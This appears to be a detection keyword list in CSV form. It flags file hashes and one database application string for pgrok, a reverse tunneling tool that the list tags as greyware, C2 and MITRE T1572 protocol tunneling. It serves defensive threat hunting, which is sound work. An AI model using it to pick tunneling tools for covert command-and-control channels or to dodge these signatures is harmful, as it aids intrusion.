"*5f712eb517e8d795f053d28f443cddea953a0bfa339f78eed68a1c01566d84d3*",".{0,1000}5f712eb517e8d795f053d28f443cddea953a0bfa339f78eed68a1c01566d84d3.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*62dca9e606b8d8c2a1379e791210dece010cd801912d588dbbf3859d00a821da*",".{0,1000}62dca9e606b8d8c2a1379e791210dece010cd801912d588dbbf3859d00a821da.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*63ccc3e608d3225793b40e643af2115811668731a2b43cbf5217bfb3d7e01d84*",".{0,1000}63ccc3e608d3225793b40e643af2115811668731a2b43cbf5217bfb3d7e01d84.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*6fec9d5af24c2d845ab1e2146e38196ae9a8ae351442c6fb8a048373befd88d8*",".{0,1000}6fec9d5af24c2d845ab1e2146e38196ae9a8ae351442c6fb8a048373befd88d8.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*763ca50b38753d213fa1c4b3d447ad0b7f595e9251f5471be04c6dae3a034308*",".{0,1000}763ca50b38753d213fa1c4b3d447ad0b7f595e9251f5471be04c6dae3a034308.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*78db6e175aac64df82c8c51798da5dcedeb82559fa7cdcc489a718f87c385203*",".{0,1000}78db6e175aac64df82c8c51798da5dcedeb82559fa7cdcc489a718f87c385203.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*79ae34d44a22c9c5e7f1eb1d60fc19e8ab43120cdf0852d8e17ea62ee39669ac*",".{0,1000}79ae34d44a22c9c5e7f1eb1d60fc19e8ab43120cdf0852d8e17ea62ee39669ac.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*7a75ffa6b95556dfc5841eed63d45ad41eb495c0da386aa4f61ddf209a529075*",".{0,1000}7a75ffa6b95556dfc5841eed63d45ad41eb495c0da386aa4f61ddf209a529075.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*7be3968468ba873800b67376c017a529418f1aa250f65577776b9630641f2468*",".{0,1000}7be3968468ba873800b67376c017a529418f1aa250f65577776b9630641f2468.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*7ffdce15d8adc97dcaaa845d3e7f493b9750103f4e0e6a3e5281109d93272374*",".{0,1000}7ffdce15d8adc97dcaaa845d3e7f493b9750103f4e0e6a3e5281109d93272374.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*81e16f20ad480d901964c4b9bfc2f0321a4693cb123f4d3148277bd9f7bc3f5d*",".{0,1000}81e16f20ad480d901964c4b9bfc2f0321a4693cb123f4d3148277bd9f7bc3f5d.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*8513ddc466aa21460a7790754d7f9441725820996f68ae44731bd63fb8abd957*",".{0,1000}8513ddc466aa21460a7790754d7f9441725820996f68ae44731bd63fb8abd957.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*8572bd593860c780a609128b9764e2f98e13ebf7130018e288f067bc75c71ef3*",".{0,1000}8572bd593860c780a609128b9764e2f98e13ebf7130018e288f067bc75c71ef3.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*869076f7f55c9cecc46bcef4b7c44a7538f2af695ff8ce728c71a0d52c48443b*",".{0,1000}869076f7f55c9cecc46bcef4b7c44a7538f2af695ff8ce728c71a0d52c48443b.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*89c0d3180d1baa0b0ca6fb7dd3af81a80400ea4c5674101a5800c074bd3aec98*",".{0,1000}89c0d3180d1baa0b0ca6fb7dd3af81a80400ea4c5674101a5800c074bd3aec98.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*8c3d91b1b0f23fa6998de41c1f4c12eab9f14e39fc224d3055477fbdf0c8a7aa*",".{0,1000}8c3d91b1b0f23fa6998de41c1f4c12eab9f14e39fc224d3055477fbdf0c8a7aa.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*8d2162fe492d7be3c17eb6578d8fcdedaeffe2294156a3f898f0cdb1fb6c10a8*",".{0,1000}8d2162fe492d7be3c17eb6578d8fcdedaeffe2294156a3f898f0cdb1fb6c10a8.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*92ba52da6b5b623559117809305a93ee9ad6da07ea6352efec349e8d2760d307*",".{0,1000}92ba52da6b5b623559117809305a93ee9ad6da07ea6352efec349e8d2760d307.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*9827e63054ddec1ffe0f246f9bb0c0de0d30deac2055481b44304d13cc928fe2*",".{0,1000}9827e63054ddec1ffe0f246f9bb0c0de0d30deac2055481b44304d13cc928fe2.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*99e0f20ad43baaff5a1a38d9bb0e98a2b2269b8fc6ac3c3ff6fb70b802fb6911*",".{0,1000}99e0f20ad43baaff5a1a38d9bb0e98a2b2269b8fc6ac3c3ff6fb70b802fb6911.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*9b6ebca62874fff570d19b1d7eeee8eca39f0e9fe1c5496930413527fceaf85a*",".{0,1000}9b6ebca62874fff570d19b1d7eeee8eca39f0e9fe1c5496930413527fceaf85a.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*9c86d0fbe739883dc37c81ff6a9e4fa7f06417c56fa52ad6ceb6ba7bc3e9f420*",".{0,1000}9c86d0fbe739883dc37c81ff6a9e4fa7f06417c56fa52ad6ceb6ba7bc3e9f420.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*9dd63128c55bdc6f062713958960f7bdec1983051df3114d9cfc2037089686c3*",".{0,1000}9dd63128c55bdc6f062713958960f7bdec1983051df3114d9cfc2037089686c3.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*9f6ee8fe7fea7bb68fed2ca7626a9277af8990ff8ee565c03ca3eecc083717df*",".{0,1000}9f6ee8fe7fea7bb68fed2ca7626a9277af8990ff8ee565c03ca3eecc083717df.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*a2551565a931107db6e9ed883c7252bcfb51b185f95d598cffc30dc7997c4d61*",".{0,1000}a2551565a931107db6e9ed883c7252bcfb51b185f95d598cffc30dc7997c4d61.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*a2e65bd4579385605e7233852bea4627cf94a2ee83e6233d462740b7e930c284*",".{0,1000}a2e65bd4579385605e7233852bea4627cf94a2ee83e6233d462740b7e930c284.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*a483e9f06a8e03c3a09028279f8a03380dfc41c5ee85327763e684c866f9019f*",".{0,1000}a483e9f06a8e03c3a09028279f8a03380dfc41c5ee85327763e684c866f9019f.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*a8a01db928e625521789fb4187b72857049ea2542d1795afbe581ed6d77e6bc1*",".{0,1000}a8a01db928e625521789fb4187b72857049ea2542d1795afbe581ed6d77e6bc1.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*a8ab4a99f65193c1bba3f8864a0f1d39e8d7c97843b4ac0fbacc98fe1d2ec161*",".{0,1000}a8ab4a99f65193c1bba3f8864a0f1d39e8d7c97843b4ac0fbacc98fe1d2ec161.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*a8effdadf86dd52ed13ab8051982927ea464500c36b4d0c1fff5158da2b4abed*",".{0,1000}a8effdadf86dd52ed13ab8051982927ea464500c36b4d0c1fff5158da2b4abed.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*a920c6b7605a82318a7f60f4a2bcab191359f6187983bbb82e56a6fe2cd7418d*",".{0,1000}a920c6b7605a82318a7f60f4a2bcab191359f6187983bbb82e56a6fe2cd7418d.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*application_name='pgrokd'*",".{0,1000}application_name\=\'pgrokd\'.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*b1ce529f2a0ff157590b2607388d425ac9a0d076de7f58bb6ee7c14bdb657bd7*",".{0,1000}b1ce529f2a0ff157590b2607388d425ac9a0d076de7f58bb6ee7c14bdb657bd7.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*b668e7abef3da11ad164c618aff533f225d96fa046034e64485a48eaf5fdaf58*",".{0,1000}b668e7abef3da11ad164c618aff533f225d96fa046034e64485a48eaf5fdaf58.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*b7efb92268e1e7897c0844e0a0f6c8648173a3c5c2c51d46fa5677b6c58c1dcd*",".{0,1000}b7efb92268e1e7897c0844e0a0f6c8648173a3c5c2c51d46fa5677b6c58c1dcd.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*b8714bdc54a797d35052db4d241bf2c5ca1dbd0f0ab549711ccdd0b54b4d1d55*",".{0,1000}b8714bdc54a797d35052db4d241bf2c5ca1dbd0f0ab549711ccdd0b54b4d1d55.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*b886f3afc9b5d11dcf8741b00aff8c1f43f1007554ac58f949c7654df0566fed*",".{0,1000}b886f3afc9b5d11dcf8741b00aff8c1f43f1007554ac58f949c7654df0566fed.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*b9488c840679a25f1afc5666025727d823751107550249b8b28fdda43cf270d2*",".{0,1000}b9488c840679a25f1afc5666025727d823751107550249b8b28fdda43cf270d2.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*ba9ae74a938a83efcaee904b800d7bff0b19e02f632c4956bd0361e6a32f4ef3*",".{0,1000}ba9ae74a938a83efcaee904b800d7bff0b19e02f632c4956bd0361e6a32f4ef3.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*bdb7525b0af0c8528ee5811393f46ca0905eea38ec615ba68bf86f9d358e9c11*",".{0,1000}bdb7525b0af0c8528ee5811393f46ca0905eea38ec615ba68bf86f9d358e9c11.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*c54778b8dc4e458130197cf95d6fc594cc1b016b70eea917f8a44c2c37c080c7*",".{0,1000}c54778b8dc4e458130197cf95d6fc594cc1b016b70eea917f8a44c2c37c080c7.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*c6df3acfa4964ce75534e76ea4635280be68c946b8b5d0566a858337e74d5fd3*",".{0,1000}c6df3acfa4964ce75534e76ea4635280be68c946b8b5d0566a858337e74d5fd3.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*cbab130e55af45dd1cc7b1644a799b92f7fa4b04f82b93e021e182399b8aefec*",".{0,1000}cbab130e55af45dd1cc7b1644a799b92f7fa4b04f82b93e021e182399b8aefec.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*cd23ba3117eb39491f3286532575c3ccce97f0445e18352c87799a7f82274c10*",".{0,1000}cd23ba3117eb39491f3286532575c3ccce97f0445e18352c87799a7f82274c10.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*cd5b16213c11faffa7ed44becec55368348013aa980e6a38f85f7f2a0aa2b85e*",".{0,1000}cd5b16213c11faffa7ed44becec55368348013aa980e6a38f85f7f2a0aa2b85e.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*cec943f322857887bed2af7cf0aacb4052dcdb63eb76180f6a2022e3e4133718*",".{0,1000}cec943f322857887bed2af7cf0aacb4052dcdb63eb76180f6a2022e3e4133718.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*cf2a0ea978a7f5a254a046155a39127ae68701a7b4ec51dd2e509b9f217e960f*",".{0,1000}cf2a0ea978a7f5a254a046155a39127ae68701a7b4ec51dd2e509b9f217e960f.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*d0e4117d84d8a5e8a716a6cf6f06128a365465eb83e803a85ecd9ab2671468b4*",".{0,1000}d0e4117d84d8a5e8a716a6cf6f06128a365465eb83e803a85ecd9ab2671468b4.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*d110395a75afff8f1e8c54c7ae5fbd9e085ec21da4c472e4fb11346c17d8652d*",".{0,1000}d110395a75afff8f1e8c54c7ae5fbd9e085ec21da4c472e4fb11346c17d8652d.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*d273dcfbaab605187495a344d65d3a39f423144bf005a36bee87c292ab202c69*",".{0,1000}d273dcfbaab605187495a344d65d3a39f423144bf005a36bee87c292ab202c69.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*d6541e6233d5baf5190b494f434dcf30943c33d4bb78266cac230eb905a10f50*",".{0,1000}d6541e6233d5baf5190b494f434dcf30943c33d4bb78266cac230eb905a10f50.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*d789739fc4f5928ee0cb38a4520f9562562cffb2e3a48ab3cd6ba0c6e8b4cfb5*",".{0,1000}d789739fc4f5928ee0cb38a4520f9562562cffb2e3a48ab3cd6ba0c6e8b4cfb5.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*d8d88c5aecf5f0b27208387cc830fd094e2b0e7230a965728a6862ee9c8278e0*",".{0,1000}d8d88c5aecf5f0b27208387cc830fd094e2b0e7230a965728a6862ee9c8278e0.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*d9473d3695626684a9cae93f417516900fd0f21a03f61e6943f50435c762ac73*",".{0,1000}d9473d3695626684a9cae93f417516900fd0f21a03f61e6943f50435c762ac73.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*da409444f4db4761ccf441e1e9ba8ba39ab8e63bf0dcc8054308aa5e805379d6*",".{0,1000}da409444f4db4761ccf441e1e9ba8ba39ab8e63bf0dcc8054308aa5e805379d6.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*db20e3d1a1eb02a323d1d3abcdd7adfdb71c04965988edb4e75fbe28c03858bc*",".{0,1000}db20e3d1a1eb02a323d1d3abcdd7adfdb71c04965988edb4e75fbe28c03858bc.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*dc8ddf520783dad3b74770b0ad90d0201b090ef858dee7971825b7e45424f799*",".{0,1000}dc8ddf520783dad3b74770b0ad90d0201b090ef858dee7971825b7e45424f799.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
